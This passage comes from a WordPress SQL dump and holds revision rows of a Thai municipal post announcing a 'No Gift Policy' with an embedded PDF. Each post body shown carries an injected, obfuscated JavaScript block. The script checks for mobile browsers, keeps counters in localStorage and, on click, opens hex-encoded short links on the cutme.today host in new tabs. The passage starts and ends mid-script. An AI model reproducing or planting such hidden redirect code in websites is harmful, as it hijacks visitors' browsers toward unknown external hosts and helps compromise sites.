0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:22:37','2025-06-09 06:22:37','',859,'http://pakhaeng.ssk.in.th/?p=1292',0,'revision','',0),
(1293,1,'2025-06-09 13:23:11','2025-06-09 06:23:11','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่','','inherit','closed','closed','','859-revision-v1','','','2025-06-09 13:23:11','2025-06-09 06:23:11','',859,'http://pakhaeng.ssk.in.th/?p=1293',0,'revision','',0),
(1294,1,'2025-06-09 13:24:03','2025-06-09 06:24:03','<!-- wp:file {\"id\":1288,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"ประกาศเจตนารมณ์\"></object><a id=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\">ประกาศเจตนารมณ์</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/ประกาศเจตนารมณ์.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-d480394b-e28d-47e0-9058-1227d33f603b\">Download</a></div>\n<!-- /wp:file -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g 